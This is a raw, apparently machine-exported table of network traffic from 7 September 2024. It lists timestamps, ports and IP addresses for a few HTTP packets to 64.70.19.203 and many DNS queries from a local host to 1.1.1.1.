                                                                                                                                                                    Sep 7, 2024 15:37:56.441463947 CEST6006280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:56.441555023 CEST6006280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:56.446554899 CEST806006264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.448415995 CEST6006280192.168.2.1264.70.19.203
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 7, 2024 15:33:53.579710007 CEST5128553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:54.271966934 CEST53512851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:54.384427071 CEST6224553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:54.418948889 CEST53622451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:54.525239944 CEST5460053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:54.713202000 CEST53546001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:54.822097063 CEST5563953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:54.983932018 CEST53556391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:55.087666988 CEST5066053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:55.141983032 CEST53506601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:55.244141102 CEST5213053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:55.257162094 CEST53521301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:55.266999006 CEST5275353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:56.259012938 CEST5275353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:57.032766104 CEST53527531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.032788992 CEST53527531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:57.634665966 CEST5713153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:58.145251989 CEST53571311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:58.259561062 CEST4968653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:58.363454103 CEST53496861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:58.478267908 CEST5571053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:58.489187956 CEST53557101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.119075060 CEST5570053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:59.129482985 CEST53557001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.243829012 CEST6309053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:59.485904932 CEST53630901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.603308916 CEST6483253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:59.639368057 CEST53648321.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:33:59.743859053 CEST5281253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:33:59.758078098 CEST53528121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.400078058 CEST5073053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:00.446687937 CEST53507301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:00.556747913 CEST5525453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:00.565422058 CEST53552541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.212735891 CEST6371653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:01.235281944 CEST53637161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.337610006 CEST6253753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:01.346591949 CEST53625371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.462591887 CEST6259053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:01.472197056 CEST53625901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:01.588553905 CEST5899853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:02.422512054 CEST53589981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:02.525135040 CEST5172453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:02.621221066 CEST53517241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:02.728389025 CEST5784053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:02.737663984 CEST53578401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.368984938 CEST6503853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:03.387983084 CEST53650381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:03.994112968 CEST6365653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:04.024153948 CEST53636561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.134828091 CEST6419353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:04.374180079 CEST53641931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.479046106 CEST6046953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:04.513751030 CEST53604691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:04.619697094 CEST5751953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:04.628490925 CEST53575191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.228272915 CEST6521653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:05.245862007 CEST53652161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.353241920 CEST5557053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:05.573199987 CEST53555701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.681720972 CEST6056153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:05.691004992 CEST53605611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.806375980 CEST5616053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:05.815408945 CEST53561601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.931368113 CEST6324453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:06.040009022 CEST53632441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:06.150173903 CEST6501853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:06.349597931 CEST53650181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:06.462645054 CEST4970653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:06.964643955 CEST53497061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.072546959 CEST4966653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:07.082529068 CEST53496661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.713227034 CEST5070753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:07.850415945 CEST53507071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.963151932 CEST5927553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:08.215846062 CEST53592751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.414036989 CEST5031653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:08.443727970 CEST53503161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:09.072628975 CEST5218253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:09.172425985 CEST53521821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:09.291546106 CEST5460653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:09.386754990 CEST53546061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:09.493957043 CEST5099653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:09.510833025 CEST53509961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:09.620171070 CEST5018553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:09.891112089 CEST53501851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:09.993840933 CEST5348553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:10.012931108 CEST53534851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.621890068 CEST5227753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:10.653187990 CEST53522771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.830605030 CEST6127753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:10.839890957 CEST53612771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.446944952 CEST5070853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:11.478261948 CEST53507081.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.587526083 CEST6124153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:11.617386103 CEST53612411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.337551117 CEST6411853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:12.372349977 CEST53641181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.478374004 CEST6493153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:12.488212109 CEST53649311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.119481087 CEST5714053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:13.410795927 CEST53571401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.525167942 CEST5141853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:13.534878969 CEST53514181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.650346041 CEST5757953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:13.899894953 CEST53575791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:14.009459019 CEST6249653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:14.182250023 CEST53624961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:14.290879965 CEST6319753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:14.574824095 CEST53631971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:14.681869984 CEST5045853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:14.703742027 CEST53504581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:14.806675911 CEST5592953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:15.003458023 CEST53559291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.119019985 CEST4916153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:15.151875019 CEST53491611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.790874958 CEST6187353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:15.800240040 CEST53618731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.431473017 CEST5726553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:16.440376043 CEST53572651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.556759119 CEST4931753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:16.567248106 CEST53493171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.243938923 CEST5030753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:17.252788067 CEST53503071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.369944096 CEST5196253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:17.406939983 CEST53519621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:18.009552956 CEST5212353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:18.111867905 CEST53521231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:18.228169918 CEST5300053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:18.239238024 CEST53530001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:18.353519917 CEST5697353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:18.388878107 CEST53569731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:18.493935108 CEST6181753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:18.502749920 CEST53618171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:18.618825912 CEST5434653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:18.895550013 CEST53543461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.009530067 CEST6302553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:19.196708918 CEST53630251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.306523085 CEST6524553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:19.339669943 CEST53652451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.446844101 CEST4978453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:19.485200882 CEST53497841.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.587553024 CEST6358753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:19.777796984 CEST53635871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.884453058 CEST6435153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:19.894769907 CEST53643511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:20.524988890 CEST6549953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:20.851907015 CEST53654991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:20.962718010 CEST6398553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:21.131788015 CEST53639851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.243906021 CEST6471553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:21.434808969 CEST53647151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.541085958 CEST6006253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:21.709352016 CEST53600621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.821913004 CEST5541553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:21.831331968 CEST53554151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.446042061 CEST5812453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:22.666277885 CEST53581241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.776772976 CEST6417953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:22.787509918 CEST53641791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.462755919 CEST5801153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:23.550920963 CEST53580111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.666229963 CEST5909553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:23.723053932 CEST53590951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.837621927 CEST6167053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:24.331345081 CEST53616701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.450326920 CEST5079553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:24.482479095 CEST53507951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:25.087531090 CEST5508253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:25.255340099 CEST53550821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:25.369122982 CEST5010053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:25.538868904 CEST53501001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:25.650012016 CEST5025153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:26.481794119 CEST53502511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:26.587651968 CEST5897953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:26.827817917 CEST53589791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:26.931705952 CEST6404553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:26.962421894 CEST53640451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.072151899 CEST5981053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:27.314939976 CEST53598101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.947331905 CEST5429753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:27.956676960 CEST53542971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:28.572011948 CEST5964753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:28.735893011 CEST53596471.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:28.837699890 CEST6514553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:29.333995104 CEST53651451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:29.447001934 CEST6035053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:29.530194044 CEST53603501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.134836912 CEST6278253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:30.371249914 CEST53627821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.478301048 CEST6384553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:30.497421980 CEST53638451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.103722095 CEST6291753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:31.132431984 CEST53629171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.243859053 CEST5328953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:31.270168066 CEST53532891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.884747028 CEST6029753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:32.048664093 CEST53602971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.165786028 CEST5442753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:32.185023069 CEST53544271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:32.806293011 CEST6330853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:32.825527906 CEST53633081.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.431436062 CEST5887153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:33.450288057 CEST53588711.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.572726011 CEST5594653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:33.733843088 CEST53559461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:33.837542057 CEST6238653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:33.958445072 CEST53623861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:34.587558031 CEST6083953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:34.596278906 CEST53608391.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:35.400090933 CEST5347253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:35.894874096 CEST53534721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:36.009592056 CEST5559553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:36.044420958 CEST53555951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:36.150907040 CEST5751453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:36.748337030 CEST53575141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:36.853432894 CEST5437253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:37.024316072 CEST53543721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:37.134620905 CEST5814353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:37.311566114 CEST53581431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:37.415693998 CEST6109353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:37.747348070 CEST53610931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:37.854032040 CEST6216253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:37.872970104 CEST53621621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:37.978595018 CEST5748353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:38.088768005 CEST53574831.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.197199106 CEST5966553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:38.217118025 CEST53596651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:38.853230000 CEST6111553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:39.086492062 CEST53611151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:39.197046041 CEST5964953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:39.525587082 CEST53596491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:39.634458065 CEST6052453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:40.127105951 CEST53605241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:40.244971991 CEST5607453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:40.503824949 CEST53560741.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:40.618740082 CEST5962553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:40.851098061 CEST53596251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:40.962697029 CEST6043553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:41.206511021 CEST53604351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:41.322031975 CEST5454853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:41.332957983 CEST53545481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:41.446988106 CEST5784353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:41.545723915 CEST53578431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:41.650121927 CEST5817253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:41.684165955 CEST53581721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:41.790890932 CEST5973553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:41.894344091 CEST53597351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.010519981 CEST6179053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:42.250077963 CEST53617901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.354125023 CEST4921653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:42.368015051 CEST53492161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:42.978230953 CEST5401653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:42.994993925 CEST53540161.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.603317976 CEST5709653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:43.705763102 CEST53570961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:43.821883917 CEST5381953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:43.833671093 CEST53538191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:44.478203058 CEST6335153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:44.651115894 CEST53633511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:44.759413958 CEST5958153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:44.962937117 CEST53595811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.072324038 CEST6064153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:45.115114927 CEST53606411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.228499889 CEST5296853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:45.238301039 CEST53529681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.838500023 CEST5530453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:45.849237919 CEST53553041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:45.962519884 CEST5634253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:46.139825106 CEST53563421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:46.243747950 CEST5932853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:46.412822962 CEST53593281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:46.525069952 CEST6053353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:46.626316071 CEST53605331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:46.728137970 CEST6407953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:46.898317099 CEST53640791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.009398937 CEST5469053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:47.018152952 CEST53546901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.135204077 CEST5433553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:47.296561956 CEST53543351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.399998903 CEST5073553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:47.416975975 CEST53507351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:47.525438070 CEST5364853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:47.558073044 CEST53536481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.166043997 CEST4964253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:48.176487923 CEST53496421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.806314945 CEST5118253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:34:48.815414906 CEST53511821.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:48.931309938 CEST5849353192.168.2.121.1.1.1
